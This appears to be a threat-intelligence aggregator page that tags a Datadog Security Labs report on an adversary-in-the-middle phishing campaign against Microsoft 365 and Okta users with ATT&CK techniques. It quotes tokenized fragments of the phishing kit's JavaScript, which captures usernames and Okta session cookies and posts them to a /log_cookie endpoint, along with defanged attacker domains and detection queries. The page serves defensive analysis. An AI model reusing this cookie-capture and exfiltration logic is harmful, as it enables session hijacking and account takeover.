TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Datadog Security Labs

Investigating an adversary-in-the-middle phishing campaign targeting Microsoft 365 and Okta users

2025-12-10 · Read original ↗

ATT&CK techniques detected

19 predictions
T1539Steal Web Session Cookie
99%
“any of the cookies is a " critical " one ( session cookie ), then exfiltrates it by sending a post request to the / log _ cookie endpoint : if ( hascritical & & capturedusername ) { fetch ( ' / log _ cookie? company = ' + encodeuricomponent ( companydomain ), { method : ' post ',…”
T1566.002Spearphishing Link
98%
“##ta tenant and captures the victim ’ s credentials and session tokens. - we have witnessed a phishing email linked to this campaign being sent to hundreds of users and dozens of organizations in early december. - as of december 10, this campaign is still active. analysis of a mo…”
T1566.002Spearphishing Link
97%
“federationredirecturl = weaponizedurl ; } object. defineproperty ( xhr, " responsetext ", { value : json. stringify ( modifieddata ), writable : false } ) ; object. defineproperty ( xhr, " response ", { value : modifieddata, writable : false } ) ; identifying initial access vecto…”
T1566.002Spearphishing Link
97%
“may not redirect to the second - stage okta phishing page depending on the victim tenants ' configuration. the phishing emails / pdfs and domains use a specific lure around compensation, benefits, or salary. in this most recent iteration from december 2, 2025, the attacker ’ s ph…”
T1566.002Spearphishing Link
96%
“investigating an adversary - in - the - middle phishing campaign targeting microsoft 365 and okta users datadog has identified an active phishing campaign that targets organizations that use microsoft 365 and okta for their single sign - on ( sso ) and is able to hijack the legit…”
T1566.002Spearphishing Link
95%
“##methodfirsttype field mentioned above. source : okta @ evt. name : user. authentication. verify @ network. client. geoip. as. domain : cloudflare. com @ target. displayname : * okta * dashboard * @ debugcontext. debugdata. behaviors : ( * device = positive * and * location = po…”
T1539Steal Web Session Cookie
94%
“.. the main goal of this script is to capture sensitive credentials and session cookies before and after the victim authenticates. first, it lists cookies that should be monitored and actively stolen. these correspond to okta session cookies that are necessary to impersonate a us…”
T1566.002Spearphishing Link
93%
“okta federated users while investigating okta - related phishing pages, we identified a related set of microsoft 365 - themed phishing pages. these microsoft 365 phishing pages proxy victim traffic to legitimate microsoft endpoints to capture credentials and session cookies. howe…”
T1539Steal Web Session Cookie
82%
“( name. tolowercase ( ) ) ) { capturedusername = e. target. value ; try { localstorage. setitem ( ' okta _ captured _ username ', e. target. value ) ; sessionstorage. setitem ( ' okta _ captured _ username ', e. target. value ) ; } catch ( e ) { } document. cookie = ' okta _ capt…”
T1566.002Spearphishing Link
80%
“. ] io 511tactical. totalbenefitsportal [. ] com mail. totalbenefitsportal [. ] com totalbenefitsportal [. ] com smtp. totalbenefitsportal [. ] com ftp. totalbenefitsportal [. ] com pop. totalbenefitsportal [. ] com www. totalbenefitsportal [. ] com benefitscloudportal [. ] com s…”
T1111Multi-Factor Authentication Interception
70%
“investigating an adversary - in - the - middle phishing campaign targeting microsoft 365 and okta users datadog has identified an active phishing campaign that targets organizations that use microsoft 365 and okta for their single sign - on ( sso ) and is able to hijack the legit…”
T1566.002Spearphishing Link
64%
“the types of credentials available to authenticate the current user. { " username " : " victim @ org. tld ", " display " : " victim @ org. tld ",... " credentials " : { " prefcredential " : 4, " haspassword " : true, " federationredirecturl " : " https : / / victim. okta. com / a…”
T1566.002Spearphishing Link
60%
“re affected this section describes how to check if you ' ve been affected by this phishing campaign. within your okta logs if your organization is using okta fastpass, the phishing attempt may populate in your logs through the user. authentication. auth _ via _ mfa event with the…”
T1555.003Credentials from Web Browsers
54%
“io ' ) & &! url. includes ( ' company = ' ) ) { const separator = url. includes ( '? ' )? ' & ' : '? ' ; url + = separator + ' company = < target >. okta. com ' ; } } options. credentials = ' include ' ; return originalfetch ( url, options ) ; } ; the phishing page also injects i…”
T1566.002Spearphishing Link
51%
“\ / \ / ( [ ^ \. ] + ) \. ( okta | oktapreview | okta - emea ) \. com / i ) ; if ( oktamatch ) return oktamatch [ 1 ] ; var domainmatch = url. match ( / https? : \ / \ / ( [ ^ \ / ] + ) / i ) ; if ( domainmatch ) return domainmatch [ 1 ] ; return null ; } ; var createweaponizedur…”
T1566.002Spearphishing Link
50%
“and related ip addresses : spf = pass ( sender ip is redacted ) smtp. mailfrom = bounce. email. redacted ; dkim = pass ( signature was verified ) header. d = email. redacted ; dkim = pass ( signature was verified ) header. d = s1. y. mc. salesforce. com ; dmarc = pass action = no…”
T1566.002Spearphishing Link
46%
“paths of these first - stage phishing domains included a base64 - encoded json object with metadata likely used to track the campaign and control access. the object contains information for tracking, such as campaign _ id, session, ip, and id. it also contains entries to allow th…”
T1528Steal Application Access Token
43%
“the types of credentials available to authenticate the current user. { " username " : " victim @ org. tld ", " display " : " victim @ org. tld ",... " credentials " : { " prefcredential " : 4, " haspassword " : true, " federationredirecturl " : " https : / / victim. okta. com / a…”
T1566.002Spearphishing Link
39%
“email. source : microsoft - 365 @ evt. name : mailitemsaccessed service : exchange @ folders. folderitems. subject : ( " action required : review your 2026 salary & bonus information " or thank? you,? *? \ : * your? 2026? compensation? package or confidential \ :? compensation? u…”

Summary

In this post, we investigate a recent phishing campaign that targets Microsoft 365 users.